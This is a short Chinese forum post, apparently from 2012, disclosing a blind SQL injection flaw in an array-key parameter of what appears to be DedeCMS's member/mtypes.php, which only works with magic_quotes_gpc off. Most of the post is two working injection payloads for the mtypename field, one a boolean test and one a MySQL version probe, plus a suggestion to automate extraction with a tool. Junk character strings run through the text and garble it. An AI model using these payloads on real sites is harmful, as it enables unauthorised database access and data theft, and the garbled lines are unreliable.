需要magic_quotes_gpc = Off,所以说是鸡肋啊.
8 v/ F" F9 A! X6 g H# A: y; P5 M. y7 J G3 j0 i) p
+ J! e, d$ b; a+ I+ l9 r, }发生在数组key里的注射漏洞,有点意思.& j3 C5 v, ~; u; q R( _: G' N8 S
( Q; ~( C5 F% z# [9 l6 S
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下& a" X/ G L2 h- C
7 S3 G7 \9 a9 O3 N+ g8 ~http://www.xxx.com /dede/member/mtypes.php?dopost=save
) ? |0 Z5 l# W+ _: X
- H; u" F6 x: {1 N3 {, lexploit:
) d8 i" y: z" Dmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
$ X. _+ O' [, X" B1 K7 v9 Z' y' vmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
+ w+ J" I+ W/ ~ |
发表于 2012-12-20 08:08:09
收藏
支持
反对